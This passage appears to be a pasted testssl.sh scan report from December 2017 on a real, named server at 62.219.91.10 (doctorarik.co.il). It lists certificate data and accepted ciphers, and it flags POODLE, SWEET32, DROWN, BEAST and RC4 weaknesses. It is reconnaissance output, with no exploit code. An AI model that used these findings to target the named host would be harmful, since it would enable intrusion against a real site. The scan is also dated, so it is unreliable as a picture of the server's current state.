  5419.  TLS extensions (standard) "status request/#5" "renegotiation info/#65281"
  5420.  Session Ticket RFC 5077 hint (no lifetime advertised)
  5421.  SSL Session ID support yes
  5422.  Session Resumption Tickets: yes, ID: yes
  5423.  TLS clock skew -4 sec from localtime
  5424.  Signature Algorithm SHA256 with RSA
  5425.  Server key size RSA 2048 bits
  5426.  Fingerprint / Serial SHA1 0BB7413C950A275DF33377BF39362D6DB2075E5C / 239E30BA064D957DE0A47B7B0508C258
  5427. SHA256 D4B63BA4B0EB88CB74B56246F047B7949CC3B770AFF2B9F510D98F9A51334E1A
  5428.  Common Name (CN) negba.dtnt.info
  5429.  subjectAltName (SAN) negba.dtnt.info 
  5430.  Issuer thawte DV SSL CA - G2 (thawte, Inc. from US)
  5431.  Trust (hostname) certificate does not match supplied URI (same w/o SNI)
  5432.  Chain of trust Ok 
  5433.  EV cert (experimental) no
  5434.  Certificate Expiration 66 >= 60 days (2017-02-04 19:00 --> 2018-03-07 18:59 -0500)
  5435.  # of certificates provided 2
  5436.  Certificate Revocation List http://tn.symcb.com/tn.crl
  5437.  OCSP URI http://tn.symcd.com
  5438.  OCSP stapling offered
  5439.  OCSP must staple no
  5440.  DNS CAA RR (experimental) not offered
  5441.  Certificate Transparency yes (certificate extension)
  5442.  
  5443.  
  5444.  Testing vulnerabilities 
  5445.  
  5446.  Heartbleed (CVE-2014-0160) not vulnerable (OK), no heartbeat extension
  5447.  CCS (CVE-2014-0224) not vulnerable (OK)
  5448.  Ticketbleed (CVE-2016-9244), experiment. -- (applicable only for HTTPS)
  5449.  ROBOT not vulnerable (OK)
  5450.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  5451.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  5452.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK) (not using HTTP anyway)
  5453.  POODLE, SSL (CVE-2014-3566) VULNERABLE (NOT ok), uses SSLv3+CBC (check TLS_FALLBACK_SCSV mitigation below)
  5454.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention NOT supported and vulnerable to POODLE SSL
  5455.  SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
  5456.  FREAK (CVE-2015-0204) not vulnerable (OK)
  5457.  DROWN (CVE-2016-0800, CVE-2016-0703) VULNERABLE (NOT ok), SSLv2 offered with 2 ciphers
  5458. Make sure you don't use this certificate elsewhere, see:
  5459. https://censys.io/ipv4?q=D4B63BA4B0EB88CB74B56246F047B7949CC3B770AFF2B9F510D98F9A51334E1A
  5460.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no DH key detected
  5461.  BEAST (CVE-2011-3389) SSL3: DES-CBC3-SHA 
  5462. TLS1: AES128-SHA AES256-SHA
  5463. DES-CBC3-SHA
  5464. ECDHE-RSA-AES128-SHA
  5465. ECDHE-RSA-AES256-SHA 
  5466. VULNERABLE -- and no higher protocols as mitigation supported
  5467.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  5468.  RC4 (CVE-2013-2566, CVE-2015-2808) VULNERABLE (NOT ok): RC4-SHA RC4-MD5
  5469. RC4-MD5 
  5470.  
  5471.  
  5472.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  5473.  
  5474. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  5475. -----------------------------------------------------------------------------------------------------------------------------
  5476. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  5477. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  5478. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  5479. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  5480. x05 RC4-SHA RSA RC4 128 TLS_RSA_WITH_RC4_128_SHA
  5481. x04 RC4-MD5 RSA RC4 128 TLS_RSA_WITH_RC4_128_MD5
  5482. x010080 RC4-MD5 RSA RC4 128 SSL_CK_RC4_128_WITH_MD5
  5483. x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
  5484. x0700c0 DES-CBC3-MD5 RSA 3DES 168 SSL_CK_DES_192_EDE3_CBC_WITH_MD5
  5485.  
  5486. Could not determine the protocol, only simulating generic clients.
  5487.  
  5488.  Running client simulations via sockets 
  5489.  
  5490. Java 6u45 TLSv1.0 AES128-SHA
  5491. Java 7u25 TLSv1.0 AES128-SHA
  5492. Java 8u31 TLSv1.0 AES128-SHA
  5493. OpenSSL 1.0.1l TLSv1.0 AES128-SHA
  5494. OpenSSL 1.0.2e TLSv1.0 AES128-SHA
  5495.  
  5496.  Done 2017-12-30 23:48:37 [ 498s] -->> 62.219.91.10:443 (doctorarik.co.il) <<--
  5497. #######################################################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement